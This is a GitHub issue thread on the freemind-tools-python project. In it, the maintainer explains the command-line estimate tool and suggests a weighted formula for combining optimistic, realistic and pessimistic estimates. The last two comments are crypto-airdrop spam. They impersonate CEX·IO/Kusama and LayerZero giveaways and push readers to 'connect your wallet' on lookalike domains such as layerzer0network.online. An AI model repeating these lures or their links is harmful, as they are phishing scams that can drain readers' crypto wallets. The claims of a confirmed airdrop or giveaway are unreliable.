### ISSUE TITLE
How do you print a report for a different type of estimation?

### ISSUE THREAD

**Issue by ktor** [mrjazz/freemind-tools-python#1]
Hi @mrjazz,

thank you for the article https://sheremetov.com/links/the-hidden-power-of-freemind-for-business-analysis/ and the tools!! They are great. What I haven't yet found out is how do you print out different type of estimations you've mentioned in the article:
> Depending on the project, I can add different types of estimates like optimistic/pessimistic or backend/frontend/mobile/design/etc to one node, look at estimate through different perspectives. Here is an example.
> ![test](https://sheremetov.com/wp-content/uploads/2019/10/estimate.gif)

How would you implement that?

**Comment by mrjazz** [comment]
Hi, thanks! Glad to hear you like it. 

I have command line tool based on this library. For Windows you should use mm.bat, for Linux/Mac mm.sh. If you'll install python and packages: "pip install -r requirements.txt" you'll be able run it like this:

```
> ./mm.sh 
Empty command passed
Existing commands are: display, todo, goals, stat, traverse, questions, estimate, spec, tex
```
Commands are all automation in my shell script. You are welcome to extend it with features you'll need.
For example, if you would like to calculate estimate you can use my mindmap file to test:
```
> ./mm.sh estimate --path=tests/Test.mm  
 - New Mindmap/Groups/Task1, 4h
 - New Mindmap/Groups/Task2, 2h

Total: 6.0h
```

**Comment by ktor** [comment]
Hi @mrjazz ,

great to hear from you! 

I've used the scripts you've mentioned for a current project and they worked great for `estimation` attribute. I needed to have a consultant engagement computed as a percent of estimated efforts and was able to produce that with the patch: https://github.com/ktor/freemind-tools-python/commit/e25f68471f49a8f29321b793aafd91865a2b3b00. 

However I have not find one feature you've described in the article: computing different estimation variants like: pessimistic, optimistic. I also have not found the `mm.sh` command in the source code, I just used `shell.py` to invoke my code: `python ./shell.py estimateconsultant --path=/tmp/project-estimations.mm`. Maybe I've overlooked that. I just wanted to ask if you maybe have that somewhere else than in github or have an idea how would you implement that. 

Btw. I needed to have nodes printed from a root, created a pull request if you're interested: https://github.com/mrjazz/freemind-tools-python/pull/2

**Comment by mrjazz** [comment]
Yes, you are right I didn't put it here because it seems too specific to my personal workflow. It seems like you can easily implement it. I you need any help are welcome.

P.S. If you will implement optimistic/realistic approach. I would recommend you add third one estimate, "realistic" and then calculate estimate like:
```
estimate = (optimistic + 2 * realistic + pessimistic) / 6
```

**Comment by pradip-ee** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by jstechno** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!
